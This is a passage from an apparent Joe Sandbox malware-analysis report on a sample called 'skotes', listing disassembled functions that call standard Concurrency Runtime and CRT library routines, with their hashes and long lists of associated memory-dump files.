                                                                                                                • Associated: 00000009.00000002.3370822057.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370887849.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370946195.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3371008126.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3372074771.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_780000_skotes.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: Wait$BlockConcurrency::details::_Lock::_Scoped_lock$Block::Concurrency::Concurrency::details::Context::ReaderReentrantScoped_lock::_Scoped_lock::~_SpinWriter
                                                                                                                • String ID: iy
                                                                                                                • API String ID: 1182035702-1789661967
                                                                                                                • Opcode ID: 2f48fe8bd9d083e1fccbbf0bf728291f06e1647d3d76f156ab5b0400f9d8234b
                                                                                                                • Instruction ID: c066ca8b139cacf72a06a382cfa244139c4842e0c12ef431efd9cc83bb34a557
                                                                                                                • Opcode Fuzzy Hash: 2f48fe8bd9d083e1fccbbf0bf728291f06e1647d3d76f156ab5b0400f9d8234b
                                                                                                                • Instruction Fuzzy Hash: D6218370C10215DADF78DFA4E8496EEB7F1FF15360F100A2EE051A61D1E7795A44CB51
                                                                                                                APIs
                                                                                                                • Concurrency::details::SchedulerBase::GetInternalContext.LIBCONCRT ref: 007A7903
                                                                                                                  • Part of subcall function 007A5CB8: __EH_prolog3_catch.LIBCMT ref: 007A5CBF
                                                                                                                  • Part of subcall function 007A5CB8: Concurrency::details::SchedulerBase::ThrottlingTime.LIBCMT ref: 007A5CF8
                                                                                                                • Concurrency::details::SchedulerBase::ThrottlingTime.LIBCMT ref: 007A792A
                                                                                                                • Concurrency::details::SchedulerBase::GetInternalContext.LIBCONCRT ref: 007A7936
                                                                                                                  • Part of subcall function 007A5CB8: Concurrency::details::SchedulerBase::AddContext.LIBCONCRT ref: 007A5D70
                                                                                                                  • Part of subcall function 007A5CB8: Concurrency::details::InternalContextBase::SpinUntilBlocked.LIBCMT ref: 007A5D7E
                                                                                                                • Concurrency::details::SchedulerBase::GetNextSchedulingRing.LIBCMT ref: 007A7982
                                                                                                                • Concurrency::location::_Assign.LIBCMT ref: 007A79A3
                                                                                                                • Concurrency::details::SchedulerBase::StartupVirtualProcessor.LIBCONCRT ref: 007A79AB
                                                                                                                • Concurrency::details::SchedulerBase::ThrottlingTime.LIBCMT ref: 007A79BD
                                                                                                                • Concurrency::details::SchedulerBase::ChangeThrottlingTimer.LIBCONCRT ref: 007A79ED
                                                                                                                  • Part of subcall function 007A691D: Concurrency::details::SchedulerBase::FoundAvailableVirtualProcessor.LIBCONCRT ref: 007A6942
                                                                                                                  • Part of subcall function 007A691D: Concurrency::details::VirtualProcessor::ClaimTicket::ExerciseWith.LIBCMT ref: 007A6965
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.3366662935.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.3366626281.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366662935.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366745256.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366768692.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366796206.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367107515.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367177492.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367276568.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367276568.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369064269.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369106262.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369182022.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369291233.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369323074.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369346313.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369395324.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369433714.00000000009AC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369563154.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369679868.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369776520.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369872584.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369987756.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370042279.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370094443.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370149282.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370204937.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370268119.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370318976.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370383288.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370447817.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370495306.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370579055.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370645936.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370645936.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370822057.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370887849.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370946195.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3371008126.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3372074771.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_780000_skotes.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: Concurrency::details::$Base::$Scheduler$ContextThrottling$InternalTimeVirtual$Processor$AssignAvailableBlockedChangeClaimConcurrency::location::_ExerciseFoundH_prolog3_catchNextProcessor::RingSchedulingSpinStartupTicket::TimerUntilWith
                                                                                                                • String ID:
                                                                                                                • API String ID: 1475861073-0
                                                                                                                • Opcode ID: e5f6ca3cbb7375102534bb9ce9f7030bf6bb821756b29020f3f95bdaa7addcda
                                                                                                                • Instruction ID: 9af66c616a16321ebd9cf97a83ae86bebecd485026ca1819f69eb1048f85309a
                                                                                                                • Opcode Fuzzy Hash: e5f6ca3cbb7375102534bb9ce9f7030bf6bb821756b29020f3f95bdaa7addcda
                                                                                                                • Instruction Fuzzy Hash: 5A31C331B08255AACF1AAB784C967FFB7B59FC7300F0443AAD495D7242DA2C6D4AC391
                                                                                                                APIs
                                                                                                                • Concurrency::details::UMS::CreateUmsCompletionList.LIBCONCRT ref: 007ADD91
                                                                                                                • Concurrency::details::InternalContextBase::ExecutedAssociatedChore.LIBCONCRT ref: 007ADDAE
                                                                                                                • Concurrency::details::InternalContextBase::WorkWasFound.LIBCONCRT ref: 007ADE14
                                                                                                                • Concurrency::details::InternalContextBase::ExecuteChoreInline.LIBCMT ref: 007ADE29
                                                                                                                • Concurrency::details::InternalContextBase::WaitForWork.LIBCONCRT ref: 007ADE3B
                                                                                                                • Concurrency::details::InternalContextBase::CleanupDispatchedContextOnCancel.LIBCMT ref: 007ADE4B
                                                                                                                • Concurrency::details::UMS::GetCurrentUmsThread.LIBCONCRT ref: 007ADE74
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.3366662935.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.3366626281.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366662935.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366745256.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366768692.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366796206.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367107515.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367177492.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367276568.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367276568.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369064269.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369106262.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369182022.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369291233.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369323074.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369346313.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369395324.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369433714.00000000009AC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369563154.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369679868.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369776520.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369872584.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369987756.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370042279.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370094443.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370149282.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370204937.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370268119.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370318976.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370383288.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370447817.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370495306.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370579055.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370645936.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370645936.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370822057.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370887849.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370946195.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3371008126.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3372074771.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_780000_skotes.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: Concurrency::details::$Context$Base::Internal$ChoreWork$AssociatedCancelCleanupCompletionCreateCurrentDispatchedExecuteExecutedFoundInlineListThreadWait
                                                                                                                • String ID:
                                                                                                                • API String ID: 2885714658-0
                                                                                                                • Opcode ID: 9c8bc9f910bf508f2d7f5ac2dc8e9bd7c7d22020f5e31b6536735440a8726927
                                                                                                                • Instruction ID: dbbca4e3857e570f6890f173b33f76476e4d9826750908f26a3456ae658cc2a1
                                                                                                                • Opcode Fuzzy Hash: 9c8bc9f910bf508f2d7f5ac2dc8e9bd7c7d22020f5e31b6536735440a8726927
                                                                                                                • Instruction Fuzzy Hash: 2E419070A08244DACF25FBB484597ED77A16F97704F1446A9E8426F6C3DB3C9E04CB62
                                                                                                                APIs
                                                                                                                • Concurrency::details::InternalContextBase::ReclaimVirtualProcessor.LIBCONCRT ref: 007AE7D7
                                                                                                                  • Part of subcall function 007AE544: Concurrency::details::VirtualProcessor::Deactivate.LIBCONCRT ref: 007AE577
                                                                                                                  • Part of subcall function 007AE544: Concurrency::details::VirtualProcessor::Deactivate.LIBCONCRT ref: 007AE599
                                                                                                                • Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 007AE854
                                                                                                                • Concurrency::details::ScheduleGroupSegmentBase::ReleaseInternalContext.LIBCMT ref: 007AE860
                                                                                                                • Concurrency::details::SchedulerBase::TriggerCommitSafePoints.LIBCMT ref: 007AE86F
                                                                                                                • Concurrency::details::SchedulerBase::VirtualProcessorActive.LIBCONCRT ref: 007AE879
                                                                                                                • Concurrency::location::_Assign.LIBCMT ref: 007AE8AD
                                                                                                                • Concurrency::details::ScheduleGroupSegmentBase::AddRunnableContext.LIBCONCRT ref: 007AE8B5
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.3366662935.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.3366626281.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366662935.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366745256.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366768692.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366796206.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367107515.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367177492.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367276568.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367276568.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369064269.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369106262.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369182022.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369291233.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369323074.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369346313.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369395324.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369433714.00000000009AC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369563154.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369679868.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369776520.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369872584.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369987756.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370042279.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370094443.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370149282.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370204937.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370268119.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370318976.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370383288.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370447817.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370495306.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370579055.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370645936.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370645936.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370822057.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370887849.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370946195.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3371008126.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3372074771.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_780000_skotes.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: Concurrency::details::$Base::$Context$Virtual$DeactivateGroupInternalProcessorProcessor::ScheduleSchedulerSegment$ActiveAssignCommitConcurrency::location::_EventPointsReclaimReleaseRunnableSafeTraceTrigger
                                                                                                                • String ID:
                                                                                                                • API String ID: 1924466884-0
                                                                                                                • Opcode ID: cc37943117baa7e37393a6dddb4fd97e2a7189c980d0e1734f5182af479d03ff
                                                                                                                • Instruction ID: f0eb223d7508535a376e2631861f5ff077bc6851d1230eeddb001839d69cd793
                                                                                                                • Opcode Fuzzy Hash: cc37943117baa7e37393a6dddb4fd97e2a7189c980d0e1734f5182af479d03ff
                                                                                                                • Instruction Fuzzy Hash: 35411B75A00204DFCF05EF64C895BADB7B5FF89310F1481A9DD459B382DB38A941CBA1
                                                                                                                APIs
                                                                                                                • ListArray.LIBCONCRT ref: 007A4538
                                                                                                                • ListArray.LIBCONCRT ref: 007A456C
                                                                                                                • Hash.LIBCMT ref: 007A45D5
                                                                                                                • Hash.LIBCMT ref: 007A45E5
                                                                                                                  • Part of subcall function 007A9C41: std::bad_exception::bad_exception.LIBCMT ref: 007A9C63
                                                                                                                • Concurrency::details::RegisterAsyncTimerAndLoadLibrary.LIBCONCRT ref: 007A474B
                                                                                                                • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 007A47A4
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.3366662935.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.3366626281.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366662935.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366745256.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366768692.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366796206.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367107515.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367177492.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367276568.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367276568.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369064269.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369106262.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369182022.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369291233.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369323074.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369346313.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369395324.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369433714.00000000009AC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369563154.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369679868.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369776520.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369872584.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369987756.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370042279.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370094443.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370149282.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370204937.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370268119.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370318976.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370383288.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370447817.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370495306.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370579055.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370645936.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370645936.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370822057.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370887849.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370946195.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3371008126.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3372074771.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_780000_skotes.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: ArrayHashList$AsyncConcurrency::details::Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorLibraryLoadRegisterTimerstd::bad_exception::bad_exception
                                                                                                                • String ID:
                                                                                                                • API String ID: 3010677857-0
                                                                                                                • Opcode ID: aaa5b2cad927fe5fd309a7e30b321b707fd4001827c48c64a26c5f47b5fdd5c6
                                                                                                                • Instruction ID: 14206cc6e31e783885e9dec30a44bf79140244cdaf7a28e76a295021bc0540b8
                                                                                                                • Opcode Fuzzy Hash: aaa5b2cad927fe5fd309a7e30b321b707fd4001827c48c64a26c5f47b5fdd5c6
                                                                                                                • Instruction Fuzzy Hash: D08153B0A11B52FAD708DF748849BD9FAA8BF46710F10431AF52897281DBB96560CBD1
                                                                                                                APIs
                                                                                                                • __EH_prolog3_GS.LIBCMT ref: 0079ECED
                                                                                                                • Concurrency::details::_NonReentrantPPLLock::_Scoped_lock::_Scoped_lock.LIBCONCRT ref: 0079ED17
                                                                                                                  • Part of subcall function 0079F3DD: Concurrency::critical_section::_Acquire_lock.LIBCONCRT ref: 0079F3FA
                                                                                                                • __alloca_probe_16.LIBCMT ref: 0079ED53
                                                                                                                • Concurrency::details::EventWaitNode::Satisfy.LIBCONCRT ref: 0079ED94
                                                                                                                • Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock.LIBCONCRT ref: 0079EDC6
                                                                                                                • __freea.LIBCMT ref: 0079EDEC
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.3366662935.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.3366626281.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366662935.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366745256.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366768692.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366796206.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367107515.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
